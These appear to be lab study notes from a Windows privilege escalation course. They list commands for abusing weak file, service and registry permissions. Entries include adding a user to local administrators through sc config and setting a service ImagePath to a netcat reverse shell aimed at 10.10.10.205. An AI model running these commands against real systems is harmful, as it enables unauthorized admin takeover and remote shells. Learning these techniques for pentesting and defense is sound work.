Weak Permissions

Recursos

• https://ss64.com/nt/icacls.html

• Privilege Escalation with Autoruns

• The Microsoft Press Store by Pearson

---

Tools

• SharpUp

---

Permissive File System ACLs

Running SharpUp

.\SharpUp.exe audit

Checking Permissions with icacls

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Replacing Service Binary

cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService

Weak Service Permissions

Reviewing SharpUp Again

SharpUp.exe audit

Checking Permissions with AccessChk

accesschk.exe /accepteula -quvcw WindscribeService

Check Local Admin Group

net localgroup administrators

Changing the Service Binary Path

sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

Stopping Service

sc stop WindscribeService

Starting the Service

sc start WindscribeService

Confirming Local Admin Group Addition

net localgroup administrators

Weak Service Permissions - Cleanup

Reverting the Binary Path

sc config WindScribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"

Starting the Service Again

sc start WindScribeService

Verifying Service is Running

sc query WindScribeService

Unquoted Service Path

Querying Service

sc qc SystemExplorerHelpService

Searching for Unquoted Service Paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Permissive Registry ACLs

Checking for Weak Service ACLs in Registry

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Changing ImagePath with PowerShell

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

Modifiable Registry Autorun Binary

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl